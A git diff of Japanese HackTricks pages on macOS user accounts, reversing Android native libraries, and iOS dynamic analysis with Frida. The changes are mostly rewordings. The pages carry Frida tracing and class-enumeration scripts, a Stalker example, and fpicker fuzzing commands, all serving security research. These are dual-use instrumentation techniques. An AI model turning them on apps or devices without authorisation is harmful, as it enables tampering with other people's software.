* [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つける
|
||||
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)** に参加するか、[telegramグループ](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) をフォローする
|
||||
* **ハッキングテクニックを共有するために** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出する
|
||||
- **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェック!
|
||||
- [**公式PEASS&HackTricksグッズ**](https://peass.creator-spring.com)を入手
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つける
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)** に参加するか、[telegramグループ](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) をフォローする
|
||||
- **HackTricks** と **HackTricks Cloud** のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗聴マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io) は **ダークウェブ** で活動する検索エンジンで、企業やその顧客が **盗難マルウェア** によって **侵害** されたかどうかをチェックする **無料** 機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
|
||||
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
|
||||
彼らのウェブサイトをチェックして、**無料** でエンジンを試すことができます:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -30,12 +30,12 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
### 一般ユーザー
|
||||
|
||||
* **Daemon**: システムデーモン用に予約されたユーザー。デフォルトのデーモンアカウント名は通常 "\_" で始まります:
|
||||
- **Daemon**: システムデーモン用に予約されたユーザー。デフォルトのデーモンアカウント名は通常 "\_" で始まります:
|
||||
|
||||
```bash
|
||||
_amavisd, _analyticsd, _appinstalld, _appleevents, _applepay, _appowner, _appserver, _appstore, _ard, _assetcache, _astris, _atsserver, _avbdeviced, _calendar, _captiveagent, _ces, _clamav, _cmiodalassistants, _coreaudiod, _coremediaiod, _coreml, _ctkd, _cvmsroot, _cvs, _cyrus, _datadetectors, _demod, _devdocs, _devicemgr, _diskimagesiod, _displaypolicyd, _distnote, _dovecot, _dovenull, _dpaudio, _driverkit, _eppc, _findmydevice, _fpsd, _ftp, _fud, _gamecontrollerd, _geod, _hidd, _iconservices, _installassistant, _installcoordinationd, _installer, _jabber, _kadmin_admin, _kadmin_changepw, _knowledgegraphd, _krb_anonymous, _krb_changepw, _krb_kadmin, _krb_kerberos, _krb_krbtgt, _krbfast, _krbtgt, _launchservicesd, _lda, _locationd, _logd, _lp, _mailman, _mbsetupuser, _mcxalr, _mdnsresponder, _mobileasset, _mysql, _nearbyd, _netbios, _netstatistics, _networkd, _nsurlsessiond, _nsurlstoraged, _oahd, _ondemand, _postfix, _postgres, _qtss, _reportmemoryexception, _rmd, _sandbox, _screensaver, _scsd, _securityagent, _softwareupdate, _spotlight, _sshd, _svn, _taskgated, _teamsserver, _timed, _timezone, _tokend, _trustd, _trustevaluationagent, _unknown, _update_sharing, _usbmuxd, _uucp, _warmd, _webauthserver, _windowserver, _www, _wwwproxy, _xserverdocs
|
||||
```
|
||||
* **Guest**: 非常に厳しい権限を持つゲスト用アカウント
|
||||
- **Guest**: 非常に厳しい権限を持つゲスト用アカウント
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
|
@ -44,12 +44,12 @@ for i in "${state[@]}"; do sysadminctl -"${i}" status; done;
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
* **Nobody**: 最小限の権限が必要なプロセスは、このユーザーで実行されます
|
||||
* **Nobody**: 最小限の権限が必要な場合にこのユーザーでプロセスが実行されます
|
||||
* **Root**
|
||||
|
||||
### ユーザー権限
|
||||
|
||||
* **Standard User:** 最も基本的なユーザー。このユーザーは、ソフトウェアのインストールやその他の高度なタスクを実行しようとする際には、管理者ユーザーから権限を付与される必要があります。自分自身ではそれを行うことはできません。
|
||||
* **Admin User**: ほとんどの時間を標準ユーザーとして操作するユーザーですが、ソフトウェアのインストールやその他の管理タスクなど、rootアクションを実行することが許可されています。管理者グループに属するすべてのユーザーは、**sudoersファイルを介してrootへのアクセス権限を与えられます**。
|
||||
* **Standard User:** 最も基本的なユーザーです。このユーザーはソフトウェアをインストールしたり他の高度なタスクを実行しようとする際には、管理者ユーザーから権限を付与される必要があります。自分自身ではそれを行うことはできません。
|
||||
* **Admin User**: ほとんどの時間を標準ユーザーとして操作するユーザーですが、ソフトウェアのインストールやその他の管理タスクなど、rootアクションを実行することが許可されています。管理者グループに属するすべてのユーザーは、**sudoersファイルを介してrootへのアクセスが与えられます**。
|
||||
* **Root**: Rootはほとんどのアクションを実行することが許可されているユーザーです(システムインテグリティ保護などによる制限があります)。
|
||||
* たとえば、rootは`/System`内にファイルを配置することはできません。
|
||||
|
|
|
@ -4,84 +4,82 @@
|
|||
|
||||
<summary><strong>htARTE(HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks をサポートする他の方法:
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェック!
|
||||
* [**公式PEASS&HackTricksグッズ**](https://peass.creator-spring.com)を入手
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つける
|
||||
* **Discordグループ** 💬 に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 で **@carlospolopm** をフォローする。
|
||||
|
||||
* **HackTricks** と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
|
||||
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合**は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションを見る
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で**フォロー**する [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
- **ハッキングトリックを共有するには** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) は、**ダークウェブ** を活用した検索エンジンで、企業やその顧客が **stealer malwares** によって **侵害** を受けているかどうかをチェックする **無料** 機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業や顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
|
||||
彼らのウェブサイトをチェックして、**無料** でエンジンを試すことができます:
|
||||
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
**詳細はこちら: [https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)**
|
||||
**詳細については、[https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)**をチェックしてください。
|
||||
|
||||
Androidアプリは、パフォーマンス重視のタスクには一般的にCまたはC++で書かれたネイティブライブラリを使用します。マルウェア作成者もこれらのライブラリを使用し、DEXバイトコードよりもリバースエンジニアリングが難しいためです。このセクションでは、Android向けに調整されたリバースエンジニアリングスキルが強調されており、アセンブリ言語の教育ではありません。互換性のためにARMおよびx86バージョンのライブラリが提供されています。
|
||||
Androidアプリは、パフォーマンス重視のタスクにはCまたはC++で書かれたネイティブライブラリを使用することができます。マルウェア作成者もこれらのライブラリを使用し、DEXバイトコードよりもリバースエンジニアリングが難しいためです。このセクションでは、Android向けに調整されたリバースエンジニアリングスキルを強調し、アセンブリ言語の教育よりも重視しています。互換性のためにARMおよびx86バージョンのライブラリが提供されています。
|
||||
|
||||
### 主なポイント:
|
||||
- **Androidアプリのネイティブライブラリ:**
|
||||
### キーポイント:
|
||||
- **Androidアプリのネイティブライブラリ:**
|
||||
- パフォーマンス重視のタスクに使用されます。
|
||||
- CまたはC++で書かれており、リバースエンジニアリングが難しいです。
|
||||
- `.so`(共有オブジェクト)形式で見つかり、Linuxバイナリに類似しています。
|
||||
- マルウェア作成者は、分析を難しくするためにネイティブコードを好みます。
|
||||
|
||||
- **Java Native Interface(JNI)&Android NDK:**
|
||||
- **Java Native Interface(JNI)&Android NDK:**
|
||||
- JNIは、Javaメソッドをネイティブコードで実装することを可能にします。
|
||||
- NDKは、ネイティブコードを書くためのAndroid固有のツールセットです。
|
||||
- JNIとNDKは、Java(またはKotlin)コードとネイティブライブラリを結びつけます。
|
||||
|
||||
- **ライブラリのロードと実行:**
|
||||
- ライブラリは `System.loadLibrary` または `System.load` を使用してメモリにロードされます。
|
||||
- ライブラリのロード時に `JNI_OnLoad` が実行されます。
|
||||
- **ライブラリのロードと実行:**
|
||||
- ライブラリは`System.loadLibrary`または`System.load`を使用してメモリにロードされます。
|
||||
- ライブラリのロード時に`JNI_OnLoad`が実行されます。
|
||||
- Javaで宣言されたネイティブメソッドは、ネイティブ関数にリンクされ、実行を可能にします。
|
||||
|
||||
- **Javaメソッドをネイティブ関数にリンクする:**
|
||||
- **動的リンキング:** ネイティブライブラリ内の関数名が特定のパターンに一致するため、自動的にリンクが可能です。
|
||||
- **静的リンキング:** 関数の命名と構造に柔軟性を提供するために `RegisterNatives` を使用します。
|
||||
- **Javaメソッドをネイティブ関数にリンクする:**
|
||||
- **ダイナミックリンキング:** ネイティブライブラリ内の関数名が特定のパターンに一致し、自動的なリンキングが可能です。
|
||||
- **スタティックリンキング:** リンキングに`RegisterNatives`を使用し、関数名や構造に柔軟性を提供します。
|
||||
|
||||
- **リバースエンジニアリングツールとテクニック:**
|
||||
- GhidraやIDA Proなどのツールがネイティブライブラリの分析に役立ちます。
|
||||
- `JNIEnv` はJNI関数と相互作用を理解するために重要です。
|
||||
- ライブラリのロード、メソッドのリンク、ネイティブ関数の特定を練習するための演習が提供されています。
|
||||
- **リバースエンジニアリングツールとテクニック:**
|
||||
- GhidraやIDA Proなどのツールがネイティブライブラリの分析を支援します。
|
||||
- `JNIEnv`はJNI関数と相互作用を理解するために重要です。
|
||||
- ライブラリのロード、メソッドのリンク、ネイティブ関数の特定の練習が提供されます。
|
||||
|
||||
### リソース:
|
||||
- **ARMアセンブリの学習:**
|
||||
### リソース:
|
||||
- **ARMアセンブリの学習:**
|
||||
- 基礎アーキテクチャの理解のために推奨されます。
|
||||
- Azeria Labs の [ARM Assembly Basics](https://azeria-labs.com/writing-arm-assembly-part-1/) をお勧めします。
|
||||
- Azeria Labsの[ARM Assembly Basics](https://azeria-labs.com/writing-arm-assembly-part-1/)がお勧めです。
|
||||
|
||||
- **JNI&NDKドキュメント:**
|
||||
- **JNI&NDKドキュメント:**
|
||||
- [OracleのJNI仕様](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html)
|
||||
- [AndroidのJNI Tips](https://developer.android.com/training/articles/perf-jni)
|
||||
- [NDKを使ったはじめ方](https://developer.android.com/ndk/guides/)
|
||||
|
||||
- **ネイティブライブラリのデバッグ:**
|
||||
- [JEB Decompilerを使用してAndroidネイティブライブラリをデバッグする](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
|
||||
- **ネイティブライブラリのデバッグ:**
|
||||
- [JEB Decompilerを使用したAndroidネイティブライブラリのデバッグ](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
|
||||
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
## WhiteIntel
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) は、**ダークウェブ** を活用した検索エンジンで、企業やその顧客が **stealer malwares** によって **侵害** を受けているかどうかをチェックする **無料** 機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業や顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
|
||||
彼らのウェブサイトをチェックして、**無料** でエンジンを試すことができます:
|
||||
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -89,13 +87,12 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
<summary><strong>htARTE(HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks をサポートする他の方法:
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェック!
|
||||
* [**公式PEASS&HackTricksグッズ**](https://peass.creator-spring.com)を入手
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つける
|
||||
* **Discordグループ** 💬 に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 で **@carlospolopm** をフォローする。
|
||||
|
||||
* **HackTricks** と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
|
||||
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合**は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションを見る
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で**フォロー**する [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
- **ハッキングトリックを共有するには** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -4,23 +4,23 @@
|
|||
|
||||
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
HackTricks をサポートする他の方法:
|
||||
|
||||
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見る
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)をフォローする
|
||||
- **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
|
||||
* **HackTricks で企業を宣伝したい**または **HackTricks をPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)をフォローする
|
||||
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、**盗難マルウェア**による企業や顧客の**侵害**をチェックするための**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
|
||||
|
||||
|
@ -40,10 +40,10 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
**Corellium**を使用している場合は、[https://github.com/frida/frida/releases](https://github.com/frida/frida/releases)からFridaリリースをダウンロードする必要があります(`frida-gadget-[yourversion]-ios-universal.dylib.gz`)し、Fridaが要求するdylibの場所に展開してコピーする必要があります。例:`/Users/[youruser]/.cache/frida/gadget-ios.dylib`
|
||||
|
||||
インストール後、PCでコマンド**`frida-ls-devices`**を使用してデバイスが表示されるかどうかを確認できます(PCがアクセスできる必要があります)。\
|
||||
また、**`frida-ps -Uia`**を実行して、電話の実行プロセスを確認できます。
|
||||
インストール後、PCでコマンド **`frida-ls-devices`** を使用してデバイスが表示されるかどうかを確認できます(PCがアクセスできる必要があります)。\
|
||||
また、**`frida-ps -Uia`** を実行して、電話の実行プロセスを確認できます。
|
||||
|
||||
## Jailbrokenデバイスなし&アプリのパッチなしでのFrida
|
||||
## JailbrokenデバイスなしでFridaを使用する方法&アプリのパッチなし
|
||||
|
||||
アプリのパッチなしでJailbrokenデバイスを使用せずにFridaを使用する方法については、次のブログ投稿を参照してください:[https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07](https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07)
|
||||
|
||||
|
@ -79,11 +79,13 @@ frida-trace -U -W <if-plugin-bin> -m '*[* *]'
|
|||
```
|
||||
### すべてのクラスとメソッドを取得する
|
||||
|
||||
* オートコンプリート: `frida -U <program>` を実行するだけ
|
||||
* オートコンプリート:`frida -U <program>`を実行するだけ
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (1156).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
* 利用可能なすべてのクラスを取得する(文字列でフィルタリング)
|
||||
* 利用可能なすべてのクラスを取得する(文字列でフィルタリング)
|
||||
|
||||
{% code title="/tmp/script.js" %}
|
||||
```javascript
|
||||
// frida -U <program> -l /tmp/script.js
|
||||
|
||||
|
@ -165,11 +167,11 @@ console.log("loaded");
|
|||
|
||||
### Frida Stalker
|
||||
|
||||
[ドキュメントから](https://frida.re/docs/stalker/): StalkerはFridaのコード**トレースエンジン**です。スレッドを**追跡**し、実行されるすべての関数、**すべてのブロック**、さらにはすべての命令を**キャプチャ**することができます。
|
||||
[ドキュメントから](https://frida.re/docs/stalker/): StalkerはFridaのコード**トレースエンジン**です。スレッドを**追跡**し、実行される**すべての関数**、**すべてのブロック**、さらにはすべての命令を**キャプチャ**することができます。
|
||||
|
||||
Frida Stalkerを実装した例は[https://github.com/poxyran/misc/blob/master/frida-stalker-example.py](https://github.com/poxyran/misc/blob/master/frida-stalker-example.py)にあります。
|
||||
|
||||
これは、関数が呼び出されるたびにFrida Stalkerをアタッチする別の例です:
|
||||
これは関数が呼び出されるたびにFrida Stalkerをアタッチする別の例です:
|
||||
```javascript
|
||||
console.log("loading");
|
||||
const wg_log_addr = Module.findExportByName("<Program>", "<function_name>");
|
||||
|
@ -304,7 +306,7 @@ rpc.exports.fuzzer = f;
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
* **Fuzzerのコンパイル**:
|
||||
* **ファジングツールをコンパイルします**:
|
||||
```bash
|
||||
# From inside fpicker clone
|
||||
## Compile from "myfuzzer.js" to "harness.js"
|
||||
|
@ -321,9 +323,9 @@ fpicker -v --fuzzer-mode active -e attach -p <Program to fuzz> -D usb -o example
|
|||
{% endcode %}
|
||||
|
||||
{% hint style="danger" %}
|
||||
この場合、各ペイロードの後にアプリを再起動したり状態を復元したりしていません。そのため、Fridaが**クラッシュ**を見つけると、その後の入力も**アプリをクラッシュ**させる可能性があります(アプリが不安定な状態にあるため)、たとえその**入力がアプリをクラッシュさせるべきでない**場合でも。
|
||||
この場合、各ペイロードの後にアプリを再起動したり状態を復元したりしていません。そのため、Fridaが**クラッシュ**を見つけた場合、そのペイロードの後の**次の入力**がアプリを**クラッシュさせる可能性**があります(アプリが不安定な状態にあるため)、たとえその**入力がアプリをクラッシュさせるべきでない**場合でも。
|
||||
|
||||
さらに、FridaはiOSの例外シグナルにフックし、**Fridaがクラッシュを見つけると**、おそらく**iOSクラッシュレポートは生成されない**でしょう。
|
||||
さらに、FridaはiOSの例外シグナルにフックするため、**Fridaがクラッシュを見つけた場合**、おそらく**iOSクラッシュレポートは生成されない**でしょう。
|
||||
|
||||
これを防ぐためには、たとえば、Fridaのクラッシュ後にアプリを再起動することができます。
|
||||
{% endhint %}
|
||||
|
@ -332,7 +334,7 @@ fpicker -v --fuzzer-mode active -e attach -p <Program to fuzz> -D usb -o example
|
|||
|
||||
**macOSコンソール**または**`log`** cliを使用してmacOSのログを確認できます。\
|
||||
**`idevicesyslog`**を使用してiOSからもログを確認できます。\
|
||||
一部のログには**`<private>`**が追加されて情報が省略されます。すべての情報を表示するには、[https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/)からいくつかのプロファイルをインストールしてそのプライベート情報を有効にする必要があります。
|
||||
一部のログには**`<private>`**という情報が省略されています。すべての情報を表示するには、[https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/)からいくつかのプロファイルをインストールしてそのプライベート情報を有効にする必要があります。
|
||||
|
||||
何をすべきかわからない場合は:
|
||||
```sh
|
||||
|
@ -356,7 +358,7 @@ killall -9 logd
|
|||
* `~/Library/Logs/DiagnosticReports`
|
||||
|
||||
{% hint style="warning" %}
|
||||
iOS only stores 25 crashes of the same app, so you need to clean that or iOS will stop creating crashes.
|
||||
iOSでは、同じアプリのクラッシュを25件しか保存しないため、それをクリーンアップするか、iOSがクラッシュを作成するのを停止します。
|
||||
{% endhint %}
|
||||
|
||||
## Frida Android Tutorials
|
||||
|
@ -370,15 +372,15 @@ iOS only stores 25 crashes of the same app, so you need to clean that or iOS wil
|
|||
* [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗聴マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
You can check their website and try their engine for **free** at:
|
||||
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -387,12 +389,12 @@ You can check their website and try their engine for **free** at:
|
|||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* **HackTricksで会社を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォロー**してください。
|
||||
* **ハッキングトリックを共有するために、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,27 +2,27 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>htARTE(HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong>!</strong></summary>
|
||||
